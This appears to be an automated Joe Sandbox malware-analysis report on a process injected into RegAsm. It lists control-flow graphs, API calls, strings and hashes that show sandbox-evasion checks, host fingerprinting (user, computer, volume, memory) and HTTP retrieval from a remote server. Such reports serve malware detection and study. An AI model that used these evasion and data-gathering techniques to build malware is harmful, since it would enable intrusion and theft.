14336->14335 14340 4075b0 14336->14340 14345 409290 vsprintf_s 14336->14345 14346 4081a0 14336->14346 14357 4075e0 
14336->14357 14338 408560 task memcpy 14337->14338 14339 40816f task 14338->14339 14339->14320 14366 408070 14340->14366 14343 408070 memcpy 14344 4075cd 14343->14344 14344->14336 14345->14336 14347 4081b2 construct 14346->14347 14348 408242 14347->14348 14352 4081c5 construct 14347->14352 14349 40825a 14348->14349 14350 4084f0 9 API calls 14348->14350 14381 4092d0 14349->14381 14350->14349 14351 4081f9 14377 409310 14351->14377 14352->14351 14370 4084f0 14352->14370 14355 40822e 14355->14336 14358 4080a0 codecvt memcpy 14357->14358 14359 4075f2 14358->14359 14360 4080a0 codecvt memcpy 14359->14360 14361 4075fd 14360->14361 14361->14336 14363 408138 construct allocator 14362->14363 14454 4083c0 14363->14454 14365 40758f 14365->14328 14367 408081 allocator 14366->14367 14368 4082d0 codecvt memcpy 14367->14368 14369 4075c2 14368->14369 14369->14343 14371 408501 14370->14371 14372 408514 14371->14372 14375 40851e 14371->14375 14385 408b70 14372->14385 14374 40851c 14374->14351 14375->14374 14388 408860 14375->14388 14378 40931c construct 14377->14378 14438 4094f0 14378->14438 14382 4092dc construct 14381->14382 14447 4094d0 14382->14447 14386 41d2d3 std::_Xinvalid_argument 5 API calls 14385->14386 14387 408b81 14386->14387 14387->14374 14389 40888d 14388->14389 14390 408892 14389->14390 14392 40889f 14389->14392 14391 408b70 5 API calls 14390->14391 14397 40889a task 14391->14397 14392->14397 14399 408ea0 14392->14399 14396 4088e2 14396->14397 14405 408ae0 14396->14405 14397->14374 14408 4093e0 14399->14408 14402 409330 14422 409600 14402->14422 14430 409360 14405->14430 14409 4088bf 14408->14409 14410 4093fc 14408->14410 14409->14402 14411 409405 ??2@YAPAXI 14410->14411 14412 40941e 14410->14412 14411->14409 14411->14412 14416 407180 14412->14416 14417 41a539 std::exception::exception strlen malloc strcpy_s 14416->14417 14418 407193 14417->14418 14419 41d394 14418->14419 14420 41d3c9 RaiseException 14419->14420 14421 41d3bd 14419->14421 14420->14409 14421->14420 
14423 409611 _Copy_impl 14422->14423 14426 409790 14423->14426 14429 4097bf 14426->14429 14427 40934f 14427->14396 14428 409310 construct 8 API calls 14428->14429 14429->14427 14429->14428 14431 409371 _Copy_impl 14430->14431 14434 409660 14431->14434 14435 409665 14434->14435 14436 408afb 14435->14436 14437 409850 task memcpy 14435->14437 14436->14397 14437->14435 14440 409504 construct allocator 14438->14440 14439 40932c 14439->14355 14440->14439 14442 409540 14440->14442 14443 4095a0 allocator 8 API calls 14442->14443 14444 409563 14443->14444 14445 4095a0 allocator 8 API calls 14444->14445 14446 409575 14445->14446 14446->14439 14450 4096d0 14447->14450 14452 4096e7 construct allocator 14450->14452 14451 4092ec 14451->14355 14452->14451 14453 409540 allocator 8 API calls 14452->14453 14453->14451 14455 4083d6 14454->14455 14460 4083d1 std::error_category::default_error_condition 14454->14460 14456 408457 14455->14456 14457 4083ff 14455->14457 14478 408560 14456->14478 14463 408a90 14457->14463 14460->14365 14461 408407 construct 14461->14460 14467 408740 14461->14467 14464 408aa5 14463->14464 14482 408e10 14464->14482 14468 408752 construct 14467->14468 14469 4087ef 14468->14469 14470 408769 construct 14468->14470 14471 4084f0 9 API calls 14469->14471 14472 408807 construct 14469->14472 14473 4084f0 9 API calls 14470->14473 14474 40879d construct 14470->14474 14471->14472 14475 409310 construct 8 API calls 14472->14475 14473->14474 14477 409310 construct 8 API calls 14474->14477 14476 4087db 14475->14476 14476->14461 14477->14476 14479 40858c task 14478->14479 14480 40856f task 14478->14480 14479->14460 14481 408ae0 task memcpy 14480->14481 14481->14479 14483 408e29 std::error_category::default_error_condition 14482->14483 14484 408acf 14483->14484 14488 4093a0 14483->14488 14484->14461 14487 408ae0 task memcpy 14487->14484 14489 4093b1 _Copy_impl 14488->14489 14492 409690 14489->14492 14494 409695 construct 14492->14494 14493 408e60 14493->14487 14494->14493 
14495 409720 _Copy_impl 8 API calls 14494->14495 14495->14494 14497 4189f9 14496->14497 14498 418a07 malloc 14497->14498 14499 4189ff 14497->14499 14498->14499 14500 418a25 14498->14500 14499->13885 14500->14499 14501 418a6d memset 14500->14501 14501->14499 15109 416593 15111 416551 15109->15111 15110 4155f0 129 API calls 15112 4165b6 15110->15112 15111->15110

            Control-flow Graph

            APIs
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040461C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404627
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404632
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040463D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404648
            • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0041649B), ref: 00404657
            • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0041649B), ref: 0040465E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040466C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404677
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404682
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 0040468D
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 00404698
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046AC
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046B7
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046C2
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046CD
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0041649B), ref: 004046D8
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
            • strlen.MSVCRT ref: 00404740
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
            • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
            Strings
            • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672, 004046FC, 00404707, 004047C0, 004047CB, 0040478F, 004046BD, 00404667, 004047B5, 004047AA, 00404693, 00404712, 0040471D, 00404622, 00404728, 00404688, 0040479F, 00404617, 004046D3, 00404763, 00404643, 004046A7, 004046B2, 00404779, 004046C8, 00404784, 0040462D, 0040476E, 00404638, 0040467D
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, separated by $)
            • API String ID: 2127927946-2218711628
            • Opcode ID: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction ID: 04d817b79848fc48b59ba69504da24c7d1b3191c531f4b94b2025844f93bc58f
            • Opcode Fuzzy Hash: e597e8fc72bf404d1b85c08bbf82363fdc41d925fce3c21812b4f2230c6aabb6
            • Instruction Fuzzy Hash: E941BB79740624EBC71C9FE5EC89B987F71AB4C712BA0C062F90299190C7F9D5019B3D

            Control-flow Graph

            control_flow_graph 725 4062d0-40635b call 41a170 call 404800 call 41a110 InternetOpenA 733 406364-406368 725->733 734 40635d 725->734 735 406559-406575 call 41a170 call 41a1d0 * 2 733->735 736 40636e-406392 InternetConnectA 733->736 734->733 752 406578-40657d 735->752 737 406398-40639c 736->737 738 40654f-406552 736->738 741 4063aa 737->741 742 40639e-4063a8 737->742 738->735 744 4063b4-4063e2 HttpOpenRequestA 741->744 742->744 746 406545-406548 744->746 747 4063e8-4063ec 744->747 746->738 749 406415-406455 HttpSendRequestA 747->749 750 4063ee-40640e 747->750 754 406457-406477 call 41a110 call 41a1d0 * 2 749->754 755 40647c-40649b call 4183e0 749->755 750->749 754->752 760 406519-406539 call 41a110 call 41a1d0 * 2 755->760 761 40649d-4064a4 755->761 760->752 764 4064a6-4064d0 InternetReadFile 761->764 765 406517-40653e 761->765 770 4064d2-4064d9 764->770 771 4064db 764->771 765->746 770->771 774 4064dd-406515 call 41a380 call 41a270 call 41a1d0 770->774 771->765 774->764
            APIs
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
              • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
              • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            • InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000,00420DE3), ref: 00406331
            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
            • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 004063D5
            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064BD
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: Internet$??2@$HttpOpenRequest$ConnectCrackFileReadSend
            • String ID: ERROR$ERROR$GET
            • API String ID: 1095854997-2509457195
            • Opcode ID: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction ID: cbac5eee591d607aa173065357eefb87c001816e051c1cde1c99a9b9dc38779b
            • Opcode Fuzzy Hash: 37c9a35f6efc1406ab06139e2c56cf7233533a6dde65a2729a3abd1b6f546bcc
            • Instruction Fuzzy Hash: AA719F71A00218EBDB24DFA0DC49FEEB775AF44704F1080AAF50A6B1D0DBB86A85CF55
            APIs
            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction ID: d97db1a59c4db881a004fd13fa95f43a4b4e799dc382b7b3ddd968380e0460c3
            • Opcode Fuzzy Hash: 964d200717a0df2f3f62487d6067e07b9107b608128a919957ff18d07be4aa47
            • Instruction Fuzzy Hash: B6F04FB1944648AFC710DF98DD45BAEBBB9FB08B21F10021AFA15A3690C7745545CBA1
            APIs
            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InfoSystem
            • String ID:
            • API String ID: 31276548-0
            • Opcode ID: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction ID: 6710e554edad90447a57410479f56be173a40300ace114c8cd68aa34356edfab
            • Opcode Fuzzy Hash: fb17d3f43d2abce587f83b1d922277e93116013ddf9f148f75be850ad6644e92
            • Instruction Fuzzy Hash: 17D05E74D0020CDBCB14DFE09A49ADDBB7AAB0D321F001656ED0572240DA305446CA65

            Control-flow Graph

            control_flow_graph 784 4195e0-4195ea 785 4195f0-419a01 784->785 786 419a06-419a9a LoadLibraryA * 5 784->786 785->786 793 419b16-419b1d 786->793 794 419a9c-419b11 786->794 796 419b23-419be1 793->796 797 419be6-419bed 793->797 794->793 796->797 799 419c68-419c6f 797->799 800 419bef-419c63 797->800 801 419c75-419d02 799->801 802 419d07-419d0e 799->802 800->799 801->802 806 419d14-419dea 802->806 807 419def-419df6 802->807 806->807 809 419e72-419e79 807->809 810 419df8-419e6d 807->810 816 419e7b-419ea7 809->816 817 419eac-419eb3 809->817 810->809 816->817 820 419ee5-419eec 817->820 821 419eb5-419ee0 817->821 826 419fe2-419fe9 820->826 827 419ef2-419fdd 820->827 821->820 833 419feb-41a048 826->833 834 41a04d-41a054 826->834 827->826 833->834 838 41a056-41a069 834->838 839 41a06e-41a075 834->839 838->839 851 41a077-41a0d3 839->851 852 41a0d8-41a0d9 839->852 851->852
            APIs
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A0D
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A1E
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A42
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A77
            • LoadLibraryA.KERNEL32(?,?,00415783,?,00000034,00000064,004160A0,?,0000002C,00000064,00416040,?,00000030,00000064,Function_000155B0,?), ref: 00419A88
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: HttpQueryInfoA$InternetSetOptionA
            • API String ID: 1029625771-1775429166
            • Opcode ID: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction ID: de404ee9f47513f53d28e8016dc56f999ad60f1515a6c9981bc8237813ea7153
            • Opcode Fuzzy Hash: 42a1c126b23ada8373e6c48d5b9de957363c63bf0e0344acec6b940ad07a1c70
            • Instruction Fuzzy Hash: 946243B5500E00AFC774DFA8EE88D1E3BABBB8C761750A51AE609C3674D7349443DBA4

            Control-flow Graph

            APIs
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ??2@$CrackInternet
            • String ID: <
            • API String ID: 676793843-4251816714
            • Opcode ID: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
            • Opcode Fuzzy Hash: 2f4ab3673443420506f52f30828b11760ea29e85b2ca068c11f228e25f55c4dd
            • Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

            Control-flow Graph

            control_flow_graph 1146 4112b0-4112dd call 41a4a0 1150 4112e7-411301 call 41a4a0 strtok_s 1146->1150 1151 4112df-4112e1 ExitProcess 1146->1151 1154 411304-411308 1150->1154 1155 4114d2-4114dd call 41a1d0 1154->1155 1156 41130e-411321 1154->1156 1158 411327-41132a 1156->1158 1159 4114ae-4114cd strtok_s 1156->1159 1161 411401-411412 1158->1161 1162 411461-411472 1158->1162 1163 411480-411491 1158->1163 1164 411423-411434 1158->1164 1165 411442-411453 1158->1165 1166 411345-411354 call 41a1f0 1158->1166 1167 41136d-41137e 1158->1167 1168 41138f-4113a0 1158->1168 1169 411331-411340 call 41a1f0 1158->1169 1170 411359-411368 call 41a1f0 1158->1170 1171 4113bd-4113ce 1158->1171 1172 4113df-4113f0 1158->1172 1173 41149f-4114a9 call 41a1f0 1158->1173 1159->1154 1192 411414-411417 1161->1192 1193 41141e 1161->1193 1200 411474-411477 1162->1200 1201 41147e 1162->1201 1204 411493-411496 1163->1204 1205 41149d 1163->1205 1194 411440 1164->1194 1195 411436-411439 1164->1195 1196 411455-411458 1165->1196 1197 41145f 1165->1197 1166->1159 1198 411380-411383 1167->1198 1199 41138a 1167->1199 1202 4113a2-4113ac 1168->1202 1203 4113ae-4113b1 1168->1203 1169->1159 1170->1159 1206 4113d0-4113d3 1171->1206 1207 4113da 1171->1207 1190 4113f2-4113f5 1172->1190 1191 4113fc 1172->1191 1173->1159 1190->1191 1191->1159 1192->1193 1193->1159 1194->1159 1195->1194 1196->1197 1197->1159 1198->1199 1199->1159 1200->1201 1201->1159 1208 4113b8 1202->1208 1203->1208 1204->1205 1205->1159 1206->1207 1207->1159 1208->1159
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: strtok_s$ExitProcess
            • String ID: block
            • API String ID: 762877946-2199623458
            • Opcode ID: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction ID: b2aee4bd772402993bd8daf8ed4e127407cef198cc172b88b11a84757ccddcb3
            • Opcode Fuzzy Hash: 1ba1f058e3e2379031d11e79f6d2bdd312730fa939e98f1981bd39696260f1a4
            • Instruction Fuzzy Hash: 6451A574B00209EFDB14DFA0E944BEE37B5BF44B04F10804AE916A7361D778D996CB5A

            Control-flow Graph

            control_flow_graph 1209 416fa0-416fea 1211 416ff3-417067 GetVolumeInformationA call 4187a0 * 3 1209->1211 1212 416fec 1209->1212 1219 417078-41707f 1211->1219 1212->1211 1220 417081-41709a call 4187a0 1219->1220 1221 41709c-4170b7 1219->1221 1220->1219 1227 4170b9-4170c6 call 41a110 1221->1227 1228 4170c8-4170f8 call 41a110 1221->1228 1232 41711e-41712e 1227->1232 1228->1232
            APIs
            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: InformationVolume
            • String ID: :$C$\
            • API String ID: 2039140958-3809124531
            • Opcode ID: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
            • Opcode Fuzzy Hash: b8d4498c9ef52ac0e7ff8a74a815c8f3508d9b1454889a6f46a668afd64d8a13
            • Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

            Control-flow Graph

            control_flow_graph 1235 401220-401247 call 418450 GlobalMemoryStatusEx 1238 401273-40127a 1235->1238 1239 401249-401271 call 41d3f0 * 2 1235->1239 1240 401281-401285 1238->1240 1239->1240 1242 401287 1240->1242 1243 40129a-40129d 1240->1243 1245 401292 1242->1245 1246 401289-401290 1242->1246 1245->1243 1246->1243 1246->1245
            APIs
            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
            • __aulldiv.LIBCMT ref: 00401258
            • __aulldiv.LIBCMT ref: 00401266
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: __aulldiv$GlobalMemoryStatus
            • String ID: @
            • API String ID: 2185283323-2766056989
            • Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
            • Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
            • Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

            Control-flow Graph

            control_flow_graph 1491 419270-419284 call 419160 1494 4194a3-419502 LoadLibraryA * 2 1491->1494 1495 41928a-41949e call 419190 1491->1495 1503 419504-419518 1494->1503 1504 41951d-419524 1494->1504 1495->1494 1503->1504 1505 419556-41955d 1504->1505 1506 419526-419551 1504->1506 1509 419578-41957f 1505->1509 1510 41955f-419573 1505->1510 1506->1505 1511 419581-419594 1509->1511 1512 419599-4195a0 1509->1512 1510->1509 1511->1512 1515 4195d1-4195d2 1512->1515 1516 4195a2-4195cc 1512->1516 1516->1515
            APIs
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194AA
            • LoadLibraryA.KERNEL32(?,?,004164A0), ref: 004194DF
            Strings
            • NtQueryInformationProcess, xrefs: 004195BA
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID: NtQueryInformationProcess
            • API String ID: 1029625771-2781105232
            • Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
            • Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
            • Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

            Control-flow Graph

            APIs
              • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
              • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
              • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
              • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
            • GetUserDefaultLCID.KERNEL32 ref: 004164C6
              • Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F
              • Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: NameUser__aulldiv$AllocComputerDefaultGlobalInfoMemoryNumaStatusSystemVirtual
            • String ID:
            • API String ID: 3178950686-0
            • Opcode ID: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction ID: c6285a65dcb1a135c62ded655b7a731d229dd5b525af539dc0d6bcccc6ed86c8
            • Opcode Fuzzy Hash: 097da323ac4eb8756f48a57aff9b622020cd776e5523750053ba436d79081546
            • Instruction Fuzzy Hash: B0319230941108BACB04FBF1DC56BEE7339AF14318F10452EF91366092DFBC6985C66A
            APIs
            • GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: ComputerName
            • String ID:
            • API String ID: 3545744682-0
            • Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
            • Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
            • Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5
            APIs
            • VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
            Memory Dump Source
            • Source File: 00000003.00000002.2071044607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
            Similarity
            • API ID: AllocNumaVirtual
            • String ID:
            • API String ID: 4233825816-0
